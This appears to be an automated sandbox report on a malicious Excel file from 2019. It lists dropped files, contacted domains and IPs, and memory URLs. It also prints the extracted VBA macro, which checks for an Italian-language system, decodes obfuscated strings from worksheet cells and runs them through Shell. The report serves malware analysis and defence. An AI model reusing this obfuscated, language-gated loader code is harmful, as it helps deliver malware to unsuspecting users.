Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	0.8446377820728672
Encrypted:	false
MD5:	2A632BABA6FBFD2172C3E8B9006D30F8
SHA1:	9AC4C368E1142C8ACF909FBA739093F6906763AE
SHA-256:	DBB3E58C088FE012C4A8F749CDDB260F09B8F5DCCAF74C85885FA66568C1F1C7
SHA-512:	ACCB9F2ABDEF3E653781595C5560CA793722A1B3A3D39A1E4C5DD23DBB18D42B711811B6D66192F5219921488029EF41B2762E39E122C4753C273617627A93D2
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBB85AEECFADB7B4E.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	12933
Entropy (8bit):	1.8597593843222135
Encrypted:	false
MD5:	9C596FD711CEAE37E562883277D427EE
SHA1:	E74943F2392A6E2F985DF38294CB14CEA9AFE9B3
SHA-256:	C7FF3C9460A4D040BF950C34662B01FC0B582443FB5A0B7AA5ED8DB10616B1B0
SHA-512:	7BA070A7B235DD5E8BC5E0B45CFE9DCBA1E7536CAE4E27F43EE97E05F31BC8ACE9DE0D31F683313E042E73922867661641B278946B294408212BD0D13C2424B7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\W9U88JM6.txt Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	ASCII text
Size (bytes):	71
Entropy (8bit):	4.251967902299817
Encrypted:	false
MD5:	C92927EE308C2156BB0F842034BEA621
SHA1:	FEA30ED60B5E5BED2E3C56BF31175729A1E6AC4F
SHA-256:	DD23C45A94A426F6C78C7A63F42EFAFBA93BF449A3139C665B763B490588159D
SHA-512:	76D260BB4A1C626068F929A63D693DDD98F37F8BE203012C0D62A7528DEAB3B62600393A2486705DAFB27ABBEFE16B61BA8F01C6E33C160FF0A219A0ABE3AD70
Malicious:	false
Preview:	lang.en.laddloanalao.xyz/.1536.607528448.30787137.927414640.30781102.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HZPS4FI3NXVBGXIUPGCH.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.57134199054027
Encrypted:	false
MD5:	8106BE2834CE3A10AC3185D01DA0C6BC
SHA1:	03825D986839E794FE85241D70ACDA563D97DB5F
SHA-256:	BDCAB1056B59B0C92EDDF6F5D16B6E0FED1EBE81B8378CE0F62D9EF76D220CA7
SHA-512:	5118618979AB9525A1CE74F819F460561A35F70D50BBF1BB04F28928C6E00A1C3A4C7077924D3D71B228DE9FE3F6462587C22E08F5A15EF825E252233973621B
Malicious:	false
Preview:	...................................FL..................F.".. ....b..>...#...>...#...>...k............................P.O. .:i.....+00.../C:\...................\.1......K... PROGRA~2..D.......:...K...........................P.r.o.g.r.a.m.D.a.t.a.....X.1......K.. MICROS~1..@.......:...K..........................M.i.c.r.o.s.o.f.t.....R.1......Kx.. Windows.<.......:...Kx....(.....................W.i.n.d.o.w.s.......1......:.%..STARTM~1..j.......:...:.%...2...............@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......K...Programs..f.......:...K....3...............<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1......Kn\..ACCESS~1..l.......:...K.....4...............B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:.%..WINDOW~1..R.......:.&.:.%...8.....................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:.& .WINDOW~1.LNK..Z.......:.&.:.&...\|)....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KJ92N8DPS0W7KCC8YM6Q.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.57134199054027
Encrypted:	false
MD5:	8106BE2834CE3A10AC3185D01DA0C6BC
SHA1:	03825D986839E794FE85241D70ACDA563D97DB5F
SHA-256:	BDCAB1056B59B0C92EDDF6F5D16B6E0FED1EBE81B8378CE0F62D9EF76D220CA7
SHA-512:	5118618979AB9525A1CE74F819F460561A35F70D50BBF1BB04F28928C6E00A1C3A4C7077924D3D71B228DE9FE3F6462587C22E08F5A15EF825E252233973621B
Malicious:	false
Preview:	...................................FL..................F.".. ....b..>...#...>...#...>...k............................P.O. .:i.....+00.../C:\...................\.1......K... PROGRA~2..D.......:...K...........................P.r.o.g.r.a.m.D.a.t.a.....X.1......K.. MICROS~1..@.......:...K..........................M.i.c.r.o.s.o.f.t.....R.1......Kx.. Windows.<.......:...Kx....(.....................W.i.n.d.o.w.s.......1......:.%..STARTM~1..j.......:...:.%...2...............@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......K...Programs..f.......:...K....3...............<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1......Kn\..ACCESS~1..l.......:...K.....4...............B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:.%..WINDOW~1..R.......:.&.:.%...8.....................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:.& .WINDOW~1.LNK..Z.......:.&.:.&...\|)....................W.i.n.d.o.w.s.

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
laddloanalao.xyz	89.249.65.189	true	false	1%, Virustotal, Browse	unknown
gmail.com	216.58.201.101	true	false		high
makretplaise.xyz	192.64.119.156	true	false	0%, Virustotal, Browse	unknown
sutsyiekha.casa	94.100.28.184	true	false	0%, Virustotal, Browse	unknown
udatapost.red	unknown	unknown	true	0%, Virustotal, Browse	unknown
marvellstudio.online	unknown	unknown	true	0%, Virustotal, Browse	unknown
abrakam.site	unknown	unknown	true	0%, Virustotal, Browse	unknown
sdkscontrol.pw	unknown	unknown	true	0%, Virustotal, Browse	unknown
hiteronak.icu	unknown	unknown	true	0%, Virustotal, Browse	unknown
ublaznze.online	unknown	unknown	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.merlin.com.pl/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://www3.fnac.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
https://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-US/Firefox%20Setup%2	explorer.exe, 0000001E.00000000.2609903529.03950000.00000004.00000001.sdmp	false		high
http://www.sogou.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://%s.com	explorer.exe, 0000001E.00000000.2709755777.08AA0000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://search.rediff.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://it.search.dada.net/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://search.naver.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.abril.com.br/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://search.daum.net/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://www.clarin.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://kr.search.yahoo.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehpS	explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://www.ceneo.pl/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.pchome.com.tw/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://google.pchome.com.tw/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://search.sify.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://search.ebay.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://search.nifty.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.google.si/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://busca.orange.es/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 0000001E.00000000.2709755777.08AA0000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://www.target.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://search.orange.co.uk/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.iask.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.tesco.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://search.seznam.cz/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://laddloanalao.xyz/images/New4cJoQvo6XtZauz/hyuqnQVHdttc/Y2fQhP_2Bvp/SwIcLle_2BgVQD/gNevLmBadoM	{75AD5703-1AA1-11EA-B7AC-B2C276BF9C88}.dat.18.dr	false	Avira URL Cloud: safe	unknown
http://search.interpark.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://search.espn.go.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.myspace.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://p.zhongsou.com/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://service2.bfast.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse URL Reputation: safe	low
http://www.%s.comPA	explorer.exe, 0000001E.00000000.2603057698.01D00000.00000008.00000001.sdmp	false	URL Reputation: safe	low
http://ariadna.elmundo.es/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.news.com.au/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.cdiscount.com/	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high
http://www.tiscali.it/favicon.ico	explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
89.249.65.189	United Kingdom	9009	unknown	false
216.58.201.101	United States	15169	unknown	false
94.100.28.184	Netherlands	35017	unknown	false

Private

IP
192.168.2.2

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Mon Dec 9 08:00:06 2019, Last Saved Time/Date: Mon Dec 9 08:00:10 2019, Security: 0
Entropy (8bit):	5.853131655369292
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	MIL0001742828.xls
File size:	64000
MD5:	c5e1106f9654a23320132cbc61b3f29d
SHA1:	c7c29ff4f0b36bd5618fec2eb0da25cf4daaca3f
SHA256:	81a1fca7a1fb97fe021a1f2cf0bf9011dd2e72a5864aad674f8fea4ef009417b
SHA512:	480e021acbba978744ea746387cd61cb3f352b6021908413646578f4b146fb3e8e0244021f62088ddbe834a3e232a8fc9f28c6119cbe8e2a75238b4a4b431d21
SSDEEP:	1536:fEjTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0l3vNGsg6Pnh6vNe+PGMCpO:fEjTlYkEIuPm3fNRZmbaoFhZhR0cixIU
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "MIL0001742828.xls"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Create Time:	2019-12-09 08:00:06.588000
Last Saved Time:	2019-12-09 08:00:10
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Foglio1.cls, Stream Size: 1419

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Foglio1
VBA File Name:	Foglio1.cls
Stream Size:	1419
Data ASCII:	. . . . . . . . . L . . . . . . . " . . . . . . . S . . . . . . . . . . . . . . . % H ( . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . N o t i f i c a , 3 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . .
Data Raw:	01 16 03 00 00 12 01 00 00 4c 03 00 00 f6 00 00 00 22 02 00 00 ff ff ff ff 53 03 00 00 1b 04 00 00 00 00 00 00 01 00 00 00 25 48 28 99 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Notifica_Layout()
InStr(ActiveWorkbook.Name,
VB_Name
VB_Creatable
VB_Exposed
savechanges:=False
Frame"
VB_Customizable
"Notifica,
VB_Control
VB_Base
Questa_cartella_di_lavoro.Formato
ActiveWorkbook.Close
VB_TemplateDerived
MSForms,
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace

VBA Code

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Notifica, 3, 0, MSForms, Frame"
Private Sub Notifica_Layout()
If InStr(ActiveWorkbook.Name, "I") > 0 Then Questa_cartella_di_lavoro.Formato Else ActiveWorkbook.Close savechanges:=False
End Sub

VBA File Name: Questa_cartella_di_lavoro.cls, Stream Size: 5327

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
VBA File Name:	Questa_cartella_di_lavoro.cls
Stream Size:	5327
Data ASCII:	. . . . . . . . . B . . . . . . . 8 . . . q . . . . . . . . . . . . . . . . . . . % H n . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . # . . B F . . D . . . . . ` . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . w . . V } . N . . . c . ! 2 * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . w . . V } . N . . . c . ! 2 * # . . B F . . D . . . . . ` . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 00 01 00 00 42 08 00 00 e4 00 00 00 38 02 00 00 71 08 00 00 7f 08 00 00 a7 10 00 00 00 00 00 00 01 00 00 00 25 48 6e bb 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 23 fd d1 42 46 08 8c 44 b4 ee d5 bc 0f 60 9f cc 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Workbooks.Add
Trues()
Ffalse(caws)
Finesta
Chr(Ffalse(caws))
Riga()
Shell
DrSam
ReDim
Application.LanguageSettings.LanguageID(Riga)
cash(ByVal
(DrSam
Left(Sina,
Workbook
False
IIf(Right(Sina,
cash(Cells(i,
CInt(Mid(Sina,
hloop(zoom
Len(Sina)
hloop(False)
String
Trues(caws))
Trues(ber)
Finesta()
VB_Base
Boolean)
String,
VB_Creatable
(Mid(Sina,
VB_Exposed
savechanges:=False
Integer)
Trues(DrSam)
Ffalse(ber)
Integer
Formato()
Attribute
VB_PredeclaredId
VB_GlobalNameSpace
msoLanguageIDUI
VB_Name
Function
hloop(True)
hloop
VB_Customizable
uni))
Ffalse()
"Questa_cartella_di_lavoro"
VB_TemplateDerived
ActiveWorkbook.Close
Private

VBA Code

Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Sub Formato()
jet = 15
If 1040 <> Finesta Then ActiveWorkbook.Close savechanges:=False
Dim p As Workbook
Shell hloop(True) & Cells(15, jet) & hloop(False)
ActiveWorkbook.Close savechanges:=False
Set p = Workbooks.Add
End Sub

Private Function Riga()
Riga = msoLanguageIDUI
End Function
Private Function Finesta()
Finesta = Application.LanguageSettings.LanguageID(Riga)
End Function


Function g()
g = Int(3 * Rnd) + 3
End Function

Function hloop(zoom As Boolean)
If zoom = False Then k = 3 Else k = 0
Z = g
team = ""
For i = 9 + k To 11 + k
team = team + cash(Cells(i, g), 0, 1, 2)
Next i
hloop = team
End Function





Function cash(ByVal Sina As String, Ok, uni, tw As Integer) As String

Dim ber As Integer

Dim caws As Integer
Dim DrSam As Integer
Dim Trues() As Integer
Dim Ffalse() As Long
Dim ppis As Integer

    ppis = IIf(Right(Sina, uni) Mod 2 = Ok, tw * tw + uni, tw * tw)
    Sina = Left(Sina, Len(Sina) - IIf(Right(Sina, uni) Mod 2 = Ok, uni, uni))
    ber = Len(Sina) / ppis - uni
    ReDim Trues(ber)
    ReDim Ffalse(ber)

    caws = Ok
    DrSam = Ok

    For DrSam = Ok To ber

        Trues(DrSam) = DrSam - (ber + uni)
    Next DrSam



    For caws = Ok To ber
        For DrSam = Ok To ber
            If CInt(Mid(Sina, DrSam * ppis + uni, ppis - tw - uni)) = caws Then
                Ffalse(caws) = (Mid(Sina, (DrSam + uni) * ppis - tw, tw + uni) + Trues(caws))
                Exit For
            End If
        Next DrSam
    Next caws

    cash = ""
    For caws = Ok To ber
        cash = cash & Chr(Ffalse(caws))
    Next caws

End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 118

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	118
Entropy:	4.32915524493
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F * . . . ( F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
